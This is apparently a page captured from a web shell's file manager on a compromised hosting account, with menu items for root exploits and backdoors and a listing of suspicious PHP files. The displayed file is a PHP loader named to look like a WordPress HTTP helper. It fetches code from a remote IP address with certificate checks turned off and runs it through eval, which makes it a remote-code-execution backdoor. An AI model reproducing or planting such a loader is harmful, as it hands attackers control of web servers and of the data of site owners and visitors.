Linux premium117.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 162.0.229.113 & Your IP : 216.73.216.135
Domains :
Cant Read [ /etc/named.conf ]
User : eblama1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
eblama1 /
gts-systems.online /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-09-12 16:40
cgi-bin
[ DIR ]
drwxr-xr-x
2025-09-12 16:37
.htaccess
231
B
-rw-r--r--
2026-03-30 05:43
baindex.php
798
B
-rw-r--r--
2026-03-30 05:02
index.php
798
B
-rw-r--r--
2026-03-30 05:43
infos.php
798
B
-rw-r--r--
2026-03-30 05:43
pass.php
181.52
KB
-rw-r--r--
2026-03-30 05:43
test1.php
41.11
KB
-rw-r--r--
2026-03-30 05:43
Save
Rename
<?php function WordPress_Http_Curl ( $url, $args = array() ) { if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) { return false; } $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, $url ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( 'data' => eval( '?>'. $response ) ); return $response; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ) ; } } $result = WordPress_Http_Curl( 'http://173.208.204.2/z60309_12/stat/index.txt' );